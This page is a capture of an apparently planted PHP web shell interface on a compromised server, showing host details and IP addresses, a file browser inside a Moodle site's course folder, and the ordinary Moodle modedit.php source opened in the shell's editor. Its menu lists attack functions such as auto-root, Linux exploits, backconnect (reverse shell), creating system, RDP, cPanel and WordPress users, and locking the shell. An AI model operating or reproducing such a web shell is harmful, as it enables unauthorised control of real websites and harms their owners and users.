Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.70.126.134
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead.aptans /
course /
[ HOME SHELL ]
Name
Size
Permission
Action
ajax
[ DIR ]
drwxr-xr-x
amd
[ DIR ]
drwxr-xr-x
classes
[ DIR ]
drwxr-xr-x
format
[ DIR ]
drwxr-xr-x
report
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
yui
[ DIR ]
drwxr-xr-x
admin.php
1.75
KB
-rw-rw-r--
bulkcompletion.php
2.74
KB
-rw-rw-r--
category.ajax.php
1.24
KB
-rw-r--r--
changenumsections.php
4.23
KB
-rw-r--r--
completion.php
5.81
KB
-rw-rw-r--
completion_form.php
14.35
KB
-rw-r--r--
customfield.php
1.3
KB
-rw-r--r--
defaultcompletion.php
2.62
KB
-rw-rw-r--
delete.php
4.06
KB
-rw-r--r--
dndupload.js
41.56
KB
-rw-rw-r--
dndupload.php
1.54
KB
-rw-r--r--
dnduploadlib.php
25.66
KB
-rw-rw-r--
downloadcontent.php
3.55
KB
-rw-rw-r--
edit.php
10.23
KB
-rw-rw-r--
edit_form.php
24.04
KB
-rw-rw-r--
editbulkcompletion.php
2.61
KB
-rw-rw-r--
editcategory.php
3.84
KB
-rw-rw-r--
editdefaultcompletion.php
2.55
KB
-rw-rw-r--
editsection.php
5.81
KB
-rw-r--r--
editsection_form.php
5.01
KB
-rw-r--r--
enrol.php
1021
B
-rw-r--r--
externallib.php
198.05
KB
-rw-rw-r--
index.php
2.67
KB
-rw-rw-r--
info.php
2.68
KB
-rw-r--r--
jumpto.php
1.23
KB
-rw-r--r--
lib.php
187.89
KB
-rw-rw-r--
loginas.php
2.86
KB
-rw-r--r--
management.php
23.09
KB
-rw-rw-r--
mod.php
11.25
KB
-rw-rw-r--
modduplicate.php
1.89
KB
-rw-r--r--
modedit.php
7.54
KB
-rw-rw-r--
modlib.php
35.19
KB
-rw-rw-r--
moodleform_mod.php
56.4
KB
-rw-rw-r--
pending.php
6.48
KB
-rw-r--r--
recent.php
8.28
KB
-rw-rw-r--
recent_form.php
6.94
KB
-rw-r--r--
recommendations.php
1.98
KB
-rw-r--r--
renderer.php
119.68
KB
-rw-rw-r--
report.php
1.34
KB
-rw-r--r--
request.php
3.21
KB
-rw-rw-r--
request_form.php
6.6
KB
-rw-r--r--
reset.php
3.54
KB
-rw-rw-r--
reset_form.php
8.97
KB
-rw-r--r--
resources.php
5.01
KB
-rw-r--r--
rest.php
3.36
KB
-rw-r--r--
scales.php
4.96
KB
-rw-r--r--
search.php
4.16
KB
-rw-r--r--
switchrole.php
3.97
KB
-rw-r--r--
switchrole_form.php
3.19
KB
-rw-r--r--
tags.php
2.33
KB
-rw-r--r--
tags_form.php
1.51
KB
-rw-r--r--
togglecompletion.php
6.01
KB
-rw-r--r--
upgrade.txt
6.4
KB
-rw-rw-r--
user.php
7.87
KB
-rw-rw-r--
view.php
12.34
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : modedit.php
<?php // This file is part of Moodle - http://moodle.org/ // // Moodle is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // Moodle is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with Moodle. If not, see <http://www.gnu.org/licenses/>. /** * Adds or updates modules in a course using new formslib * * @package moodlecore * @copyright 1999 onwards Martin Dougiamas (http://dougiamas.com) * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ require_once("../config.php"); require_once("lib.php"); require_once($CFG->libdir.'/filelib.php'); require_once($CFG->libdir.'/gradelib.php'); require_once($CFG->libdir.'/completionlib.php'); require_once($CFG->libdir.'/plagiarismlib.php'); require_once($CFG->dirroot . '/course/modlib.php'); $add = optional_param('add', '', PARAM_ALPHANUM); // Module name. $update = optional_param('update', 0, PARAM_INT); $return = optional_param('return', 0, PARAM_BOOL); //return to course/view.php if false or mod/modname/view.php if true $type = optional_param('type', '', PARAM_ALPHANUM); //TODO: hopefully will be removed in 2.0 $sectionreturn = optional_param('sr', null, PARAM_INT); $url = new moodle_url('/course/modedit.php'); $url->param('sr', $sectionreturn); if (!empty($return)) { $url->param('return', $return); } if (!empty($add)) { $section = required_param('section', PARAM_INT); $course = required_param('course', PARAM_INT); $url->param('add', $add); $url->param('section', $section); $url->param('course', $course); $PAGE->set_url($url); $course = $DB->get_record('course', array('id'=>$course), '*', MUST_EXIST); require_login($course); // There is no page for this in the navigation. The closest we'll have is the course section. // If the course section isn't displayed on the navigation this will fall back to the course which // will be the closest match we have. navigation_node::override_active_url(course_get_url($course, $section)); // MDL-69431 Validate that $section (url param) does not exceed the maximum for this course / format. // If too high (e.g. section *id* not number) non-sequential sections inserted in course_sections table. // Then on import, backup fills 'gap' with empty sections (see restore_rebuild_course_cache). Avoid this. $courseformat = course_get_format($course); $maxsections = $courseformat->get_max_sections(); if ($section > $maxsections) { print_error('maxsectionslimit', 'moodle', '', $maxsections); } list($module, $context, $cw, $cm, $data) = prepare_new_moduleinfo_data($course, $add, $section); $data->return = 0; $data->sr = $sectionreturn; $data->add = $add; if (!empty($type)) { //TODO: hopefully will be removed in 2.0 $data->type = $type; } $sectionname = get_section_name($course, $cw); $fullmodulename = get_string('modulename', $module->name); if ($data->section && $course->format != 'site') { $heading = new stdClass(); $heading->what = $fullmodulename; $heading->to = $sectionname; $pageheading = get_string('addinganewto', 'moodle', $heading); } else { $pageheading = get_string('addinganew', 'moodle', $fullmodulename); } $navbaraddition = $pageheading; } else if (!empty($update)) { $url->param('update', $update); $PAGE->set_url($url); // Select the "Edit settings" from navigation. navigation_node::override_active_url(new moodle_url('/course/modedit.php', array('update'=>$update, 'return'=>1))); // Check the course module exists. $cm = get_coursemodule_from_id('', $update, 0, false, MUST_EXIST); // Check the course exists. $course = $DB->get_record('course', array('id'=>$cm->course), '*', MUST_EXIST); // require_login require_login($course, false, $cm); // needed to setup proper $COURSE list($cm, $context, $module, $data, $cw) = get_moduleinfo_data($cm, $course); $data->return = $return; $data->sr = $sectionreturn; $data->update = $update; $sectionname = get_section_name($course, $cw); $fullmodulename = get_string('modulename', $module->name); if ($data->section && $course->format != 'site') { $heading = new stdClass(); $heading->what = $fullmodulename; $heading->in = $sectionname; $pageheading = get_string('updatingain', 'moodle', $heading); } else { $pageheading = get_string('updatinga', 'moodle', $fullmodulename); } $navbaraddition = null; } else { require_login(); print_error('invalidaction'); } $pagepath = 'mod-' . $module->name . '-'; if (!empty($type)) { //TODO: hopefully will be removed in 2.0 $pagepath .= $type; } else { $pagepath .= 'mod'; } $PAGE->set_pagetype($pagepath); $PAGE->set_pagelayout('admin'); $modmoodleform = "$CFG->dirroot/mod/$module->name/mod_form.php"; if (file_exists($modmoodleform)) { require_once($modmoodleform); } else { print_error('noformdesc'); } $mformclassname = 'mod_'.$module->name.'_mod_form'; $mform = new $mformclassname($data, $cw->section, $cm, $course); $mform->set_data($data); if ($mform->is_cancelled()) { if ($return && !empty($cm->id)) { $urlparams = [ 'id' => $cm->id, // We always need the activity id. 'forceview' => 1, // Stop file downloads in resources. ]; $activityurl = new moodle_url("/mod/$module->name/view.php", $urlparams); redirect($activityurl); } else { redirect(course_get_url($course, $cw->section, array('sr' => $sectionreturn))); } } else if ($fromform = $mform->get_data()) { if (!empty($fromform->update)) { list($cm, $fromform) = update_moduleinfo($cm, $fromform, $course, $mform); } else if (!empty($fromform->add)) { $fromform = add_moduleinfo($fromform, $course, $mform); } else { print_error('invaliddata'); } if (isset($fromform->submitbutton)) { $url = new moodle_url("/mod/$module->name/view.php", array('id' => $fromform->coursemodule, 'forceview' => 1)); if (empty($fromform->showgradingmanagement)) { redirect($url); } else { redirect($fromform->gradingman->get_management_url($url)); } } else { redirect(course_get_url($course, $cw->section, array('sr' => $sectionreturn))); } exit; } else { $streditinga = get_string('editinga', 'moodle', $fullmodulename); $strmodulenameplural = get_string('modulenameplural', $module->name); if (!empty($cm->id)) { $context = context_module::instance($cm->id); } else { $context = context_course::instance($course->id); } $PAGE->set_heading($course->fullname); $PAGE->set_title($streditinga); $PAGE->set_cacheable(false); if (isset($navbaraddition)) { $PAGE->navbar->add($navbaraddition); } echo $OUTPUT->header(); if (get_string_manager()->string_exists('modulename_help', $module->name)) { echo $OUTPUT->heading_with_help($pageheading, 'modulename', $module->name, 'icon'); } else { echo $OUTPUT->heading_with_help($pageheading, '', $module->name, 'icon'); } $mform->display(); echo $OUTPUT->footer(); }
Close